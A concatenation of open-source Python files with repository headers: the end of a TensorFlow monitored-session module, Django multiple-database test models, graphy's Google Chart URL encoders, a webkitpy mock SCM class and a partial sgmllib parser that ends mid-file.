run_with_hooks = self._sess.run
return self._sess.run_step_fn(step_fn, raw_session, run_with_hooks)
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised. This may be due to a preemption in '
'a connected worker or parameter server. The current '
'session will be closed and a new session will be '
'created. Error: %s', e)
self.close()
self._sess = None
class _CoordinatedSession(_WrappedSession):
"""A wrapped session that works with a `tf.Coordinator`.
Calls to `run()` are delegated to the wrapped session. If a call
raises an exception, the exception is reported to the coordinator.
In addition, after each call to `run()` this session asks the coordinator if
the session should stop. In that case it will join all the threads
registered with the coordinator before returning.
If the coordinator was requested to stop with an exception, that exception
will be re-raised from the call to `run()`.
"""
def __init__(self, sess, coord, stop_grace_period_secs=120):
"""Create a new `_CoordinatedSession`.
Args:
sess: A `tf.Session` object. The wrapped session.
coord: A `tf.train.Coordinator` object.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
"""
_WrappedSession.__init__(self, sess)
self._coord = coord
self._stop_grace_period_secs = stop_grace_period_secs
def _check_stop(self):
# If the coordinator was asked to stop due to an exception, then it needs
# to be propagated to this stack.
self._coord.raise_requested_exception()
# At this point, no exceptions are recorded in the coordinator.
return self._coord.should_stop()
def close(self):
self._coord.request_stop()
try:
self._coord.join(
stop_grace_period_secs=self._stop_grace_period_secs,
ignore_live_threads=True)
finally:
try:
_WrappedSession.close(self)
except Exception: # pylint: disable=broad-except
# We intentionally suppress exceptions from the close() here since
# useful exceptions are already reported by join().
pass
def run(self, *args, **kwargs):
try:
return self._sess.run(*args, **kwargs)
except _PREEMPTION_ERRORS:
raise
except Exception: # pylint: disable=broad-except
# A non-preemption error could have been caused by a preemption error
# in the coordinator. If this is the case, raise that exception instead,
# since it's the root cause. Otherwise, stick to the `original_exc_info`.
original_exc_info = sys.exc_info()
try:
self._coord.raise_requested_exception()
except _PREEMPTION_ERRORS:
raise
except Exception: # pylint: disable=broad-except
raise six.reraise(*original_exc_info)
else:
raise six.reraise(*original_exc_info)
class _HookedSession(_WrappedSession):
"""A _WrappedSession that calls hooks during calls to run().
The list of hooks to call is passed in the constructor. Before each call
to `run()` the session calls the `before_run()` method of the hooks, which
can return additional ops or tensors to run. These are added to the arguments
of the call to `run()`.
When the `run()` call finishes, the session calls the `after_run()` methods of
the hooks, passing the values returned by the `run()` call corresponding to
the ops and tensors that each hook requested.
If any of the hooks requests a stop via `run_context`, the session will be
marked as needing to stop and its `should_stop()` method will then return
`True`.
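A minimal sketch of a hook that follows this protocol (the hook is
illustrative and assumes a global step variable exists in the graph):
```python
import tensorflow as tf

class EveryRunLoggingHook(tf.train.SessionRunHook):
  # Requests the global step on each run() call and prints it afterwards.

  def before_run(self, run_context):
    # Extra fetches returned here are merged into the run() arguments.
    return tf.train.SessionRunArgs(tf.train.get_global_step())

  def after_run(self, run_context, run_values):
    # run_values.results holds the result of the fetch requested above.
    print('global step after run:', run_values.results)
```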
"""
def __init__(self, sess, hooks):
"""Initializes a _HookedSession object.
Args:
sess: A `tf.Session` or a `_WrappedSession` object.
hooks: An iterable of `SessionRunHook` objects.
"""
_WrappedSession.__init__(self, sess)
self._hooks = hooks
self._should_stop = False
def _check_stop(self):
"""See base class."""
return self._should_stop
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""See base class."""
if self.should_stop():
raise RuntimeError('Run called even after should_stop requested.')
actual_fetches = {'caller': fetches}
run_context = session_run_hook.SessionRunContext(
original_args=session_run_hook.SessionRunArgs(fetches, feed_dict),
session=self._sess)
options = options or config_pb2.RunOptions()
feed_dict = self._call_hook_before_run(run_context, actual_fetches,
feed_dict, options)
# Do session run.
run_metadata = run_metadata or config_pb2.RunMetadata()
outputs = _WrappedSession.run(self,
fetches=actual_fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
for hook in self._hooks:
hook.after_run(
run_context,
session_run_hook.SessionRunValues(
results=outputs[hook] if hook in outputs else None,
options=options,
run_metadata=run_metadata))
self._should_stop = self._should_stop or run_context.stop_requested
return outputs['caller']
def _call_hook_before_run(self, run_context, fetch_dict, user_feed_dict,
options):
"""Calls hooks.before_run and handles requests from hooks."""
hook_feeds = {}
for hook in self._hooks:
request = hook.before_run(run_context)
if request is not None:
if request.fetches is not None:
fetch_dict[hook] = request.fetches
if request.feed_dict:
self._raise_if_feeds_intersects(
hook_feeds, request.feed_dict,
'Same tensor is fed by two hooks.')
hook_feeds.update(request.feed_dict)
if request.options:
self._merge_run_options(options, request.options)
if not hook_feeds:
return user_feed_dict
if not user_feed_dict:
return hook_feeds
self._raise_if_feeds_intersects(
user_feed_dict, hook_feeds,
'Same tensor is fed by a SessionRunHook and user.')
hook_feeds.update(user_feed_dict)
return hook_feeds
def _raise_if_feeds_intersects(self, feeds1, feeds2, message):
intersection = set(feeds1.keys()) & set(feeds2.keys())
if intersection:
raise RuntimeError(message + ' Conflict(s): ' + str(list(intersection)))
def _merge_run_options(self, options, incoming_options):
"""Merge two instances of RunOptions into the first one.
During the merger, the numerical fields including trace_level,
timeout_in_ms, inter_op_thread_pool are set to the larger one of the two.
The boolean value is set to the logical OR of the two.
debug_tensor_watch_opts of the original options is extended with that from
the incoming one.
Args:
options: The options to merge into.
incoming_options: The options to be merged into the first argument.
"""
options.trace_level = max(options.trace_level, incoming_options.trace_level)
options.timeout_in_ms = max(options.timeout_in_ms,
incoming_options.timeout_in_ms)
options.inter_op_thread_pool = max(options.inter_op_thread_pool,
incoming_options.inter_op_thread_pool)
options.output_partition_graphs = max(
options.output_partition_graphs,
incoming_options.output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
incoming_options.debug_options.debug_tensor_watch_opts)
| apache-2.0
camilonova/django | tests/multiple_database/models.py | 70 | 2216 |
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
class Review(models.Model):
source = models.CharField(max_length=100)
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
def __str__(self):
return self.source
class Meta:
ordering = ('source',)
class PersonManager(models.Manager):
def get_by_natural_key(self, name):
return self.get(name=name)
class Person(models.Model):
objects = PersonManager()
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Meta:
ordering = ('name',)
# This book manager doesn't do anything interesting; it just
# exists to strip out the 'extra_arg' argument to certain
# calls. This argument is used to establish that the BookManager
# is actually getting used when it should be.
class BookManager(models.Manager):
def create(self, *args, extra_arg=None, **kwargs):
return super().create(*args, **kwargs)
def get_or_create(self, *args, extra_arg=None, **kwargs):
return super().get_or_create(*args, **kwargs)
class Book(models.Model):
objects = BookManager()
title = models.CharField(max_length=100)
published = models.DateField()
authors = models.ManyToManyField(Person)
editor = models.ForeignKey(Person, models.SET_NULL, null=True, related_name='edited')
reviews = GenericRelation(Review)
pages = models.IntegerField(default=100)
def __str__(self):
return self.title
class Meta:
ordering = ('title',)
class Pet(models.Model):
name = models.CharField(max_length=100)
owner = models.ForeignKey(Person, models.CASCADE)
def __str__(self):
return self.name
class Meta:
ordering = ('name',)
class UserProfile(models.Model):
user = models.OneToOneField(User, models.SET_NULL, null=True)
flavor = models.CharField(max_length=100)
class Meta:
ordering = ('flavor',)
| bsd-3-clause
aman-tugnawat/namebench | nb_third_party/graphy/backends/google_chart_api/encoders.py | 230 | 14800 |
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display objects for the different kinds of charts.
Not intended for end users; use the methods in __init__ instead."""
import warnings
from graphy.backends.google_chart_api import util
class BaseChartEncoder(object):
"""Base class for encoders which turn chart objects into Google Chart URLS.
Object attributes:
extra_params: Dict to add/override specific chart params. Of the
form param:string, passed directly to the Google Chart API.
For example, 'cht':'lti' becomes ?cht=lti in the URL.
url_base: The prefix to use for URLs. If you want to point to a different
server for some reason, you would override this.
formatters: TODO: Need to explain how these work, and how they are
different from chart formatters.
enhanced_encoding: If True, uses enhanced encoding. If
False, simple encoding is used.
escape_url: If True, the URL will be properly escaped. If False, characters
like | and , will be left unescaped (which makes the URL easier to
read).
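For example, a rough sketch of the intended use, assuming the chart factory
helpers exposed in this package's __init__ (the 'chco' color parameter and
the data values are illustrative):
```python
from graphy.backends import google_chart_api

chart = google_chart_api.LineChart([1, 2, 3, 5, 8])
encoder = chart.display                  # the LineChartEncoder for this chart
encoder.extra_params['chco'] = 'ff0000'  # passed through to the URL as-is
print(encoder.Url(300, 150))
```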
"""
def __init__(self, chart):
self.extra_params = {} # You can add specific params here.
self.url_base = 'http://chart.apis.google.com/chart'
self.formatters = self._GetFormatters()
self.chart = chart
self.enhanced_encoding = False
self.escape_url = True # You can turn off URL escaping for debugging.
self._width = 0 # These are set when someone calls Url()
self._height = 0
def Url(self, width, height, use_html_entities=False):
"""Get the URL for our graph.
Args:
use_html_entities: If True, reserved HTML characters (&, <, >, ") in the
URL are replaced with HTML entities (&amp;, &lt;, etc.). Default is False.
"""
self._width = width
self._height = height
params = self._Params(self.chart)
return util.EncodeUrl(self.url_base, params, self.escape_url,
use_html_entities)
def Img(self, width, height):
"""Get an image tag for our graph."""
url = self.Url(width, height, use_html_entities=True)
tag = '<img src="%s" width="%s" height="%s" alt="chart"/>'
return tag % (url, width, height)
def _GetType(self, chart):
"""Return the correct chart_type param for the chart."""
raise NotImplementedError
def _GetFormatters(self):
"""Get a list of formatter functions to use for encoding."""
formatters = [self._GetLegendParams,
self._GetDataSeriesParams,
self._GetColors,
self._GetAxisParams,
self._GetGridParams,
self._GetType,
self._GetExtraParams,
self._GetSizeParams,
]
return formatters
def _Params(self, chart):
"""Collect all the different params we need for the URL. Collecting
all params as a dict before converting to a URL makes testing easier.
"""
chart = chart.GetFormattedChart()
params = {}
def Add(new_params):
params.update(util.ShortenParameterNames(new_params))
for formatter in self.formatters:
Add(formatter(chart))
for key in params:
params[key] = str(params[key])
return params
def _GetSizeParams(self, chart):
"""Get the size param."""
return {'size': '%sx%s' % (int(self._width), int(self._height))}
def _GetExtraParams(self, chart):
"""Get any extra params (from extra_params)."""
return self.extra_params
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
y_min, y_max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
series_data = []
markers = []
for i, series in enumerate(chart.data):
data = series.data
if not data: # Drop empty series.
continue
series_data.append(data)
for x, marker in series.markers:
args = [marker.shape, marker.color, i, x, marker.size]
markers.append(','.join(str(arg) for arg in args))
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, series_data, y_min, y_max, encoder)
result.update(util.JoinLists(marker = markers))
return result
def _GetColors(self, chart):
"""Color series color parameter."""
colors = []
for series in chart.data:
if not series.data:
continue
colors.append(series.style.color)
return util.JoinLists(color = colors)
def _GetDataEncoder(self, chart):
"""Get a class which can encode the data the way the user requested."""
if not self.enhanced_encoding:
return util.SimpleDataEncoder()
return util.EnhancedDataEncoder()
def _GetLegendParams(self, chart):
"""Get params for showing a legend."""
if chart._show_legend:
return util.JoinLists(data_series_label = chart._legend_labels)
return {}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Return axis.labels & axis.label_positions."""
return axis.labels, axis.label_positions
def _GetAxisParams(self, chart):
"""Collect params related to our various axes (x, y, right-hand)."""
axis_types = []
axis_ranges = []
axis_labels = []
axis_label_positions = []
axis_label_gridlines = []
mark_length = max(self._width, self._height)
for i, axis_pair in enumerate(a for a in chart._GetAxes() if a[1].labels):
axis_type_code, axis = axis_pair
axis_types.append(axis_type_code)
if axis.min is not None or axis.max is not None:
assert axis.min is not None # Sanity check: both min & max must be set.
assert axis.max is not None
axis_ranges.append('%s,%s,%s' % (i, axis.min, axis.max))
labels, positions = self._GetAxisLabelsAndPositions(axis, chart)
if labels:
axis_labels.append('%s:' % i)
axis_labels.extend(labels)
if positions:
positions = [i] + list(positions)
axis_label_positions.append(','.join(str(x) for x in positions))
if axis.label_gridlines:
axis_label_gridlines.append("%d,%d" % (i, -mark_length))
return util.JoinLists(axis_type = axis_types,
axis_range = axis_ranges,
axis_label = axis_labels,
axis_position = axis_label_positions,
axis_tick_marks = axis_label_gridlines,
)
def _GetGridParams(self, chart):
"""Collect params related to grid lines."""
x = 0
y = 0
if chart.bottom.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.bottom.min is not None)
assert(chart.bottom.max is not None)
total = float(chart.bottom.max - chart.bottom.min)
x = 100 * chart.bottom.grid_spacing / total
if chart.left.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.left.min is not None)
assert(chart.left.max is not None)
total = float(chart.left.max - chart.left.min)
y = 100 * chart.left.grid_spacing / total
if x or y:
return dict(grid = '%.3g,%.3g,1,0' % (x, y))
return {}
class LineChartEncoder(BaseChartEncoder):
"""Helper class to encode LineChart objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lc'}
def _GetLineStyles(self, chart):
"""Get LineStyle parameters."""
styles = []
for series in chart.data:
style = series.style
if style:
styles.append('%s,%s,%s' % (style.width, style.on, style.off))
else:
# If one style is missing, they must all be missing
# TODO: Add a test for this; throw a more meaningful exception
assert (not styles)
return util.JoinLists(line_style = styles)
def _GetFormatters(self):
out = super(LineChartEncoder, self)._GetFormatters()
out.insert(-2, self._GetLineStyles)
return out
class SparklineEncoder(LineChartEncoder):
"""Helper class to encode Sparkline objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lfi'}
class BarChartEncoder(BaseChartEncoder):
"""Helper class to encode BarChart objects into Google Chart URLs."""
__STYLE_DEPRECATION = ('BarChart.display.style is deprecated.' +
' Use BarChart.style, instead.')
def __init__(self, chart, style=None):
"""Construct a new BarChartEncoder.
Args:
style: DEPRECATED. Set style on the chart object itself.
"""
super(BarChartEncoder, self).__init__(chart)
if style is not None:
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
chart.style = style
def _GetType(self, chart):
# Maps (vertical, stacked) to the Google Chart type code.
types = {(True, False): 'bvg',
(True, True): 'bvs',
(False, False): 'bhg',
(False, True): 'bhs'}
return {'chart_type': types[(chart.vertical, chart.stacked)]}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Reverse labels on the y-axis in horizontal bar charts.
(Otherwise the labels come out backwards from what you would expect)
"""
if not chart.vertical and axis == chart.left:
# The left axis of horizontal bar charts needs to have reversed labels
return reversed(axis.labels), reversed(axis.label_positions)
return axis.labels, axis.label_positions
def _GetFormatters(self):
out = super(BarChartEncoder, self)._GetFormatters()
# insert at -2 to allow extra_params to overwrite everything
out.insert(-2, self._ZeroPoint)
out.insert(-2, self._ApplyBarChartStyle)
return out
def _ZeroPoint(self, chart):
"""Get the zero-point if any bars are negative."""
# (Maybe) set the zero point.
min, max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
out = {}
if min < 0:
if max < 0:
out['chp'] = 1
else:
out['chp'] = -min/float(max - min)
return out
def _ApplyBarChartStyle(self, chart):
"""If bar style is specified, fill in the missing data and apply it."""
# sanity checks
if chart.style is None or not chart.data:
return {}
(bar_thickness, bar_gap, group_gap) = (chart.style.bar_thickness,
chart.style.bar_gap,
chart.style.group_gap)
# Auto-size bar/group gaps
if bar_gap is None and group_gap is not None:
bar_gap = max(0, group_gap / 2)
if not chart.style.use_fractional_gap_spacing:
bar_gap = int(bar_gap)
if group_gap is None and bar_gap is not None:
group_gap = max(0, bar_gap * 2)
# Set bar thickness to auto if it is missing
if bar_thickness is None:
if chart.style.use_fractional_gap_spacing:
bar_thickness = 'r'
else:
bar_thickness = 'a'
else:
# Convert gap sizes to pixels if needed
if chart.style.use_fractional_gap_spacing:
if bar_gap:
bar_gap = int(bar_thickness * bar_gap)
if group_gap:
group_gap = int(bar_thickness * group_gap)
# Build a valid spec; ignore group gap if chart is stacked,
# since there are no groups in that case
spec = [bar_thickness]
if bar_gap is not None:
spec.append(bar_gap)
if group_gap is not None and not chart.stacked:
spec.append(group_gap)
return util.JoinLists(bar_size = spec)
def __GetStyle(self):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
return self.chart.style
def __SetStyle(self, value):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
self.chart.style = value
style = property(__GetStyle, __SetStyle, __STYLE_DEPRECATION)
class PieChartEncoder(BaseChartEncoder):
"""Helper class for encoding PieChart objects into Google Chart URLs.
Fuzzy frogs frolic in the forest.
Object Attributes:
is3d: if True, draw a 3d pie chart. Default is False.
"""
def __init__(self, chart, is3d=False, angle=None):
"""Construct a new PieChartEncoder.
Args:
is3d: If True, draw a 3d pie chart. Default is False. If the pie chart
includes multiple pies, is3d must be set to False.
angle: Angle of rotation of the pie chart, in radians.
"""
super(PieChartEncoder, self).__init__(chart)
self.is3d = is3d
self.angle = angle
def _GetFormatters(self):
"""Add a formatter for the chart angle."""
formatters = super(PieChartEncoder, self)._GetFormatters()
formatters.append(self._GetAngleParams)
return formatters
def _GetType(self, chart):
if len(chart.data) > 1:
if self.is3d:
warnings.warn(
'3d charts with more than one pie not supported; rendering in 2d',
RuntimeWarning, stacklevel=2)
chart_type = 'pc'
else:
if self.is3d:
chart_type = 'p3'
else:
chart_type = 'p'
return {'chart_type': chart_type}
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
pie_points = []
labels = []
max_val = 1
for pie in chart.data:
points = []
for segment in pie:
if segment:
points.append(segment.size)
max_val = max(max_val, segment.size)
labels.append(segment.label or '')
if points:
pie_points.append(points)
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, pie_points, 0, max_val, encoder)
result.update(util.JoinLists(label=labels))
return result
def _GetColors(self, chart):
if chart._colors:
# Colors were overridden by the user
colors = chart._colors
else:
# Build the list of colors from individual segments
colors = []
for pie in chart.data:
for segment in pie:
if segment and segment.color:
colors.append(segment.color)
return util.JoinLists(color = colors)
def _GetAngleParams(self, chart):
"""If the user specified an angle, add it to the params."""
if self.angle:
return {'chp' : str(self.angle)}
return {}
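  # Illustrative example (not in the original module): PieChartEncoder(chart,
  # angle=1.57) emits chp=1.57, rotating the first slice by roughly a quarter turn.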
|
apache-2.0
|
fentas/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/checkout/scm/scm_mock.py
|
122
|
4889
|
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.common.checkout.scm import CommitMessage
from webkitpy.common.system.filesystem_mock import MockFileSystem
from webkitpy.common.system.executive_mock import MockExecutive
class MockSCM(object):
def __init__(self, filesystem=None, executive=None):
self.checkout_root = "/mock-checkout"
self.added_paths = set()
self._filesystem = filesystem or MockFileSystem()
self._executive = executive or MockExecutive()
def add(self, destination_path):
self.add_list([destination_path])
def add_list(self, destination_paths):
self.added_paths.update(set(destination_paths))
def has_working_directory_changes(self):
return False
def discard_working_directory_changes(self):
pass
def supports_local_commits(self):
return True
def has_local_commits(self):
return False
def discard_local_commits(self):
pass
def discard_local_changes(self):
pass
def exists(self, path):
# TestRealMain.test_real_main (and several other rebaseline tests) are sensitive to this return value.
# We should make those tests more robust, but for now we just return True always (since no test needs otherwise).
return True
def absolute_path(self, *comps):
return self._filesystem.join(self.checkout_root, *comps)
def changed_files(self, git_commit=None):
return ["MockFile1"]
def changed_files_for_revision(self, revision):
return ["MockFile1"]
def head_svn_revision(self):
return '1234'
def svn_revision(self, path):
return '5678'
def timestamp_of_revision(self, path, revision):
return '2013-02-01 08:48:05 +0000'
def create_patch(self, git_commit, changed_files=None):
return "Patch1"
def commit_ids_from_commitish_arguments(self, args):
return ["Commitish1", "Commitish2"]
def committer_email_for_revision(self, revision):
return "[email protected]"
def commit_locally_with_message(self, message):
pass
def commit_with_message(self, message, username=None, password=None, git_commit=None, force_squash=False, changed_files=None):
pass
def merge_base(self, git_commit):
return None
def commit_message_for_local_commit(self, commit_id):
if commit_id == "Commitish1":
return CommitMessage("CommitMessage1\n" \
"https://bugs.example.org/show_bug.cgi?id=50000\n")
if commit_id == "Commitish2":
return CommitMessage("CommitMessage2\n" \
"https://bugs.example.org/show_bug.cgi?id=50001\n")
raise Exception("Bogus commit_id in commit_message_for_local_commit.")
def diff_for_file(self, path, log=None):
return path + '-diff'
def diff_for_revision(self, revision):
return "DiffForRevision%s\nhttp://bugs.webkit.org/show_bug.cgi?id=12345" % revision
def show_head(self, path):
return path
def svn_revision_from_commit_text(self, commit_text):
return "49824"
def delete(self, path):
return self.delete_list([path])
def delete_list(self, paths):
if not self._filesystem:
return
for path in paths:
if self._filesystem.exists(path):
self._filesystem.remove(path)
|
bsd-3-clause
|
dsolimando/Hot
|
hot-jython-modules/src/main/resources/sgmllib.py
|
94
|
17772
|
"""A parser for SGML, using the derived class as a static DTD."""
# XXX This only supports those SGML features used by HTML.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special). RCDATA is
# not supported at all.
import markupbase
import re
__all__ = ["SGMLParser", "SGMLParseError"]
# Regular expressions used for parsing
interesting = re.compile('[&<]')
incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|'
'<([a-zA-Z][^<>]*|'
'/([a-zA-Z][^<>]*)?|'
'![^<>]*)?')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#([0-9]+)[^0-9]')
starttagopen = re.compile('<[>a-zA-Z]')
shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/')
shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/')
piclose = re.compile('>')
endbracket = re.compile('[<>]')
tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*')
attrfind = re.compile(
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?')
class SGMLParseError(RuntimeError):
"""Exception raised for all parse errors."""
pass
# SGML parser base class -- find tags and call handler functions.
# Usage: p = SGMLParser(); p.feed(data); ...; p.close().
# The dtd is defined by deriving a class which defines methods
# with special names to handle tags: start_foo and end_foo to handle
# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself.
# (Tags are converted to lower case for this purpose.) The data
# between tags is passed to the parser by calling self.handle_data()
# with some data as argument (the data may be split up in arbitrary
# chunks). Entity references are passed by calling
# self.handle_entityref() with the entity reference as argument.
class SGMLParser(markupbase.ParserBase):
# Definition of entities -- derived classes may override
entity_or_charref = re.compile('&(?:'
'([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)'
')(;?)')
def __init__(self, verbose=0):
"""Initialize and reset this instance."""
self.verbose = verbose
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.__starttag_text = None
self.rawdata = ''
self.stack = []
self.lasttag = '???'
self.nomoretags = 0
self.literal = 0
markupbase.ParserBase.reset(self)
def setnomoretags(self):
"""Enter literal mode (CDATA) till EOF.
Intended for derived classes only.
"""
self.nomoretags = self.literal = 1
def setliteral(self, *args):
"""Enter literal mode (CDATA).
Intended for derived classes only.
"""
self.literal = 1
def feed(self, data):
"""Feed some data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n'). (This just saves the text,
all the processing is done by goahead().)
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle the remaining data."""
self.goahead(1)
def error(self, message):
raise SGMLParseError(message)
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.nomoretags:
self.handle_data(rawdata[i:n])
i = n
break
match = interesting.search(rawdata, i)
if match: j = match.start()
else: j = n
if i < j:
self.handle_data(rawdata[i:j])
i = j
if i == n: break
if rawdata[i] == '<':
if starttagopen.match(rawdata, i):
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
k = self.parse_starttag(i)
if k < 0: break
i = k
continue
if rawdata.startswith("</", i):
k = self.parse_endtag(i)
if k < 0: break
i = k
self.literal = 0
continue
if self.literal:
if n > (i + 1):
self.handle_data("<")
i = i+1
else:
# incomplete
break
continue
if rawdata.startswith("<!--", i):
# Strictly speaking, a comment is --.*--
# within a declaration tag <!...>.
# This should be removed,
# and comments handled only in parse_declaration.
k = self.parse_comment(i)
if k < 0: break
i = k
continue
if rawdata.startswith("<?", i):
k = self.parse_pi(i)
if k < 0: break
i = i+k
continue
if rawdata.startswith("<!", i):
# This is some sort of declaration; in "HTML as
# deployed," this should only be the document type
# declaration ("<!DOCTYPE html...>").
k = self.parse_declaration(i)
if k < 0: break
i = k
continue
elif rawdata[i] == '&':
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
match = charref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_charref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
else:
self.error('neither < nor & ??')
# We get here only if incomplete matches but
# nothing else
match = incomplete.match(rawdata, i)
if not match:
self.handle_data(rawdata[i])
i = i+1
continue
j = match.end(0)
if j == n:
break # Really incomplete
self.handle_data(rawdata[i:j])
i = j
# end while
if end and i < n:
self.handle_data(rawdata[i:n])
i = n
self.rawdata = rawdata[i:]
# XXX if end: check for empty stack
# Extensions for the DOCTYPE scanner:
_decl_otherchars = '='
# Internal -- parse processing instr, return length or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
if rawdata[i:i+2] != '<?':
self.error('unexpected call to parse_pi()')
match = piclose.search(rawdata, i+2)
if not match:
return -1
j = match.start(0)
self.handle_pi(rawdata[i+2: j])
j = match.end(0)
return j-i
def get_starttag_text(self):
return self.__starttag_text
# Internal -- handle starttag, return length or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
start_pos = i
rawdata = self.rawdata
if shorttagopen.match(rawdata, i):
# SGML shorthand: <tag/data/ == <tag>data</tag>
# XXX Can data contain &... (entity or char refs)?
# XXX Can data contain < or > (tag characters)?
# XXX Can there be whitespace before the first /?
match = shorttag.match(rawdata, i)
if not match:
return -1
tag, data = match.group(1, 2)
self.__starttag_text = '<%s/' % tag
tag = tag.lower()
k = match.end(0)
self.finish_shorttag(tag, data)
self.__starttag_text = rawdata[start_pos:match.end(1) + 1]
return k
# XXX The following should skip matching quotes (' or ")
# As a shortcut way to exit, this isn't so bad, but shouldn't
# be used to locate the actual end of the start tag since the
# < or > characters may be embedded in an attribute value.
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
if rawdata[i:i+2] == '<>':
# SGML shorthand: <> == <last open tag seen>
k = j
tag = self.lasttag
else:
match = tagfind.match(rawdata, i+1)
if not match:
self.error('unexpected call to parse_starttag')
k = match.end(0)
tag = rawdata[i+1:k].lower()
self.lasttag = tag
while k < j:
match = attrfind.match(rawdata, k)
if not match: break
attrname, rest, attrvalue = match.group(1, 2, 3)
if not rest:
attrvalue = attrname
else:
if (attrvalue[:1] == "'" == attrvalue[-1:] or
attrvalue[:1] == '"' == attrvalue[-1:]):
# strip quotes
attrvalue = attrvalue[1:-1]
attrvalue = self.entity_or_charref.sub(
self._convert_ref, attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = match.end(0)
if rawdata[j] == '>':
j = j+1
self.__starttag_text = rawdata[start_pos:j]
self.finish_starttag(tag, attrs)
return j
# Internal -- convert entity or character reference
def _convert_ref(self, match):
if match.group(2):
return self.convert_charref(match.group(2)) or \
'&#%s%s' % match.groups()[1:]
elif match.group(3):
return self.convert_entityref(match.group(1)) or \
'&%s;' % match.group(1)
else:
return '&%s' % match.group(1)
# Internal -- parse endtag
